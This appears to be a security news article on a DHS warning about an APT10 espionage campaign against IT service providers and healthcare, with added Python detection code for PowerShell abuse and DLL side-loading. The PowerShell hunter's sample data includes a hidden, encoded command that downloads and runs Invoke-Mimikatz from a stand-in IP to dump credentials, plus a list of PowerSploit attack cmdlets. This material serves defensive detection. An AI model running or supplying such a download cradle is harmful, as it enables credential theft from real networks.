Homeland Security Issues Warning on Cyberattack Campaign

The Department of Homeland Security is warning IT services providers, healthcare organizations and three other business sectors about a sophisticated cyberattack campaign that involves using stolen administrative credentials and implanting malware, including PLUGX/SOGU and RedLeaves, on critical systems.

  • PlugX, a well-known espionage tool in use by several threat actors;

  • RedLeaves, a newly developed, fully-featured backdoor, first used by APT10 in recent months.

Mac McMillan, president of the security consulting firm CynergisTek, says the threat is serious. "These attacks could lead to full network compromise, long-term undetected attacks, and compromise/exploitation of systems and data, essentially putting both operations and patient safety at risk," he says.

The preliminary analysis has found that threat actors appear to be leveraging stolen administrative credentials - local and domain - and certificates. Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.

DHS says the activity is still under investigation. The threat actors in this campaign have been observed employing a variety of tactics, techniques and procedures. The actors use malware implants to acquire legitimate credentials and then leverage those credentials to pivot throughout the local environment. DHS's National Cybersecurity and Communications Integration Center (NCCIC) is aware of several compromises involving the exploitation of system administrators' credentials to access trusted domains, as well as the malicious use of certificates.

Additionally, the adversary makes heavy use of PowerShell and the open source PowerSploit tool to enable assessment, reconnaissance and lateral movement, the alert notes. In addition to impersonating users via compromised credentials, the attackers are using malware implants left behind on key relay and staging machines, the alert states. In some instances, the malware has been found only in memory, with no on-disk evidence available for examination. To date, the actors have deployed multiple malware families and variants, some of which are not currently detected by anti-virus signatures. The observed malware includes PLUGX/SOGU and RedLeaves.
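The alert's description above (PowerSploit, in-memory execution, nothing on disk) translates into a concrete hunt: PowerShell script block logging (Event ID 4104) and process command lines still record what ran, even when the payload never touched disk. The following is an added example written for this page, not code from the DHS alert or the BAE/PwC research. It decodes `-EncodedCommand` payloads (base64 of UTF-16LE text, which is how powershell.exe expects them), flags a sample of real PowerSploit/PowerView cmdlet names, and flags the "download cradle" pattern (Invoke-Expression combined with a web download or base64 decode). The log records and hostnames are constructed; the cmdlet list and the accepted `-enc`-style abbreviations are samples, not complete lists.

```python
import base64
import re

# Cmdlet names shipped with the open source PowerSploit framework (PowerView is
# its Recon module). Real names, but this is a short sample, not the full list.
POWERSPLOIT_NAMES = [
    "Invoke-Mimikatz",
    "Invoke-ReflectivePEInjection",
    "Invoke-Shellcode",
    "Invoke-DllInjection",
    "Invoke-TokenManipulation",
    "Invoke-WmiCommand",
    "Get-Keystrokes",
    "Invoke-UserHunter",
    "Find-LocalAdminAccess",
    "Get-NetUser",
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; this covers the
# ones seen most often. The argument is base64 of the UTF-16LE command text.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
IEX_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
FETCH_RE = re.compile(r"Download(?:String|File|Data)|FromBase64String", re.I)


def encode_powershell(command):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload found in text, or None."""
    match = ENC_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed base64 or not UTF-16LE: not an encoded command


def analyze(record):
    """Score one log record (a 4104 ScriptBlockText or a process command line)."""
    text = record["text"]
    decoded = decode_encoded_command(text)
    findings = set()
    if decoded is not None:
        findings.add("encoded-command")
    # Inspect both the raw text and, when present, the decoded payload.
    for view in (text, decoded or ""):
        for name in POWERSPLOIT_NAMES:
            if re.search(r"\b" + re.escape(name) + r"\b", view, re.I):
                findings.add("powersploit:" + name)
        # Download cradle: remote code fetched and executed without touching disk.
        if IEX_RE.search(view) and FETCH_RE.search(view):
            findings.add("download-cradle")
    return {"host": record["host"], "user": record["user"],
            "decoded": decoded, "findings": sorted(findings)}


def hunt(records):
    """Return the analyses of every record that produced at least one finding."""
    return [r for r in map(analyze, records) if r["findings"]]


# Constructed sample records (not real telemetry). The second one has the shape
# an in-memory credential theft typically takes: hidden window, encoded cradle.
STAGED = ("IEX (New-Object Net.WebClient).DownloadString("
          "'http://192.0.2.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds")
SAMPLE_RECORDS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"host": "SRV-ADMIN02", "user": "CORP\\svc-msp-admin",
     "text": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(STAGED)},
    {"host": "DC01", "user": "CORP\\svc-msp-admin",
     "text": "Import-Module .\\PowerView.ps1; Invoke-UserHunter -CheckAccess"},
    {"host": "WS02", "user": "CORP\\asmith",
     "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_RECORDS):
        print(hit["host"], hit["user"], hit["findings"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

Run against the constructed records, only the two entries tied to the hypothetical `svc-msp-admin` account are reported: the encoded cradle is decoded and matched on `Invoke-Mimikatz`, and the PowerView enumeration on the domain controller is matched on `Invoke-UserHunter`. Name matching alone is easy to evade by renaming functions, which is why the encoded-command and cradle checks look at structure rather than strings; in production, 4104 logging has to be enabled by policy before any of this telemetry exists.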

The attackers have modified the malware to "improve effectiveness and avoid detection by existing signatures," the alert notes. DHS warns successful network intrusion involving these attacks could result in temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files and potential harm to an organization's reputation.

A recent blog post from BAE Systems and PwC notes that the current campaign, linked to APT10 (a China-based cyber espionage group), can be split into two sets of activity: attacks targeting managed service providers (MSPs), engineering and other sectors with common as well as custom malware, and attacks targeting Japanese organizations with the 'ChChes' malware.

The attacks linked to APT10 that target MSPs use a custom dropper for the group's various implants, the researchers note. "This dropper makes use of dynamic-link library side-loading to execute the main payload." In DLL side-loading, a legitimate, typically signed executable is tricked into loading a malicious DLL placed in its own directory, so the malicious code runs under a trusted process name. The researchers write that their analysis shows the attackers have used several payloads, including PlugX and RedLeaves.
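Because side-loading depends on the DLL being resolved from the executable's own directory ahead of the system directories, image-load telemetry such as Sysmon Event ID 7 gives a defender a direct check for it. The following is an added example written for this page, not code from the researchers or the alert. It treats each event as a dict mirroring the Sysmon Event 7 fields (`Image`, `ImageLoaded`, `Signed`, `SignatureStatus`; `Signed` is a bool here rather than the "true"/"false" string in the XML) and flags a DLL that is unsigned or not validly signed and was loaded from the same directory as the executable, outside `C:\Windows`. The confidence is raised when that directory is user-writable, because legitimate third-party software often ships unsigned DLLs beside its binaries but rarely runs out of a temp folder. The events, paths and signer names are constructed.

```python
import ntpath

# Directory markers that ordinary users can write to; a signed executable sitting
# here and pulling an unsigned DLL from beside itself is the classic staging pattern.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "c:\\programdata\\", "c:\\users\\public\\")


def is_user_writable(directory):
    """Crude check for a user-writable location; directory is lower-cased and ends in a backslash."""
    return any(marker in directory for marker in USER_WRITABLE_MARKERS)


def assess(event):
    """Return a finding for one image-load event, or None if it looks normal."""
    # ntpath handles Windows paths correctly even when this runs on a non-Windows host.
    image_dir = ntpath.dirname(event["Image"]).lower()
    loaded_dir = ntpath.dirname(event["ImageLoaded"]).lower()
    # Windows resolves a DLL from the application's own directory before the
    # system directories, which is what side-loading abuses. A DLL that came
    # from anywhere else is outside this heuristic.
    if loaded_dir != image_dir:
        return None
    # Executables under C:\Windows legitimately live next to their DLLs.
    if image_dir.startswith("c:\\windows\\"):
        return None
    # A validly signed DLL beside its executable is the normal shipping case.
    if event["Signed"] and event.get("SignatureStatus") == "Valid":
        return None
    confidence = "high" if is_user_writable(image_dir + "\\") else "medium"
    return {
        "image": event["Image"],
        "dll": event["ImageLoaded"],
        "confidence": confidence,
        "reason": "unsigned or invalidly signed DLL loaded from the executable's own directory",
    }


def triage(events):
    """Return findings for every event that matches the side-loading pattern."""
    return [f for f in map(assess, events) if f is not None]


# Constructed sample events (not real telemetry). Signer and product names are made up.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\svchost.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
     "Signed": True, "SignatureStatus": "Valid"},
    {"Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\update\\vendor_updater.exe",
     "ImageLoaded": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\update\\helper.dll",
     "Signed": False, "SignatureStatus": "Unavailable"},
    {"Image": "C:\\Program Files\\ExampleApp\\app.exe",
     "ImageLoaded": "C:\\Program Files\\ExampleApp\\plugin.dll",
     "Signed": False, "SignatureStatus": "Unavailable"},
    {"Image": "C:\\Program Files\\ExampleApp\\app.exe",
     "ImageLoaded": "C:\\Windows\\System32\\user32.dll",
     "Signed": True, "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["confidence"], finding["image"], "->", finding["dll"])
```

On the constructed events, the updater in the user's temp directory loading an unsigned `helper.dll` is reported at high confidence, while the unsigned plugin under Program Files is reported at medium confidence and would normally be baselined against an inventory of known software. The heuristic does not look at the executable's own signature, because Sysmon Event 7 only carries the loaded image's signature; correlating with a process-creation event (Event ID 1) that includes the parent binary's signer would tighten it further.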

"Whilst these attackers have skill, persistence, some new tools and infrastructure - there is nothing about the techniques themselves that should make this hard to detect or mitigate. The lessons learned from these incidents should be used as an opportunity for security improvements for both MSPs and their customers," the blog says.

McMillan suggests that healthcare entities take the following steps to prevent falling victim to these attacks.

  1. Healthcare organizations should ensure that their service provider is looking for the indicators.

  2. Within their own network, assess for the presence of the indicators detailed in the NCCIC report.

  3. If an indicator of compromise is detected, take appropriate action to remediate and reach out to NCCIC for assistance and further details.

  4. Review service provider contracts to ensure the vendor is actively monitoring.
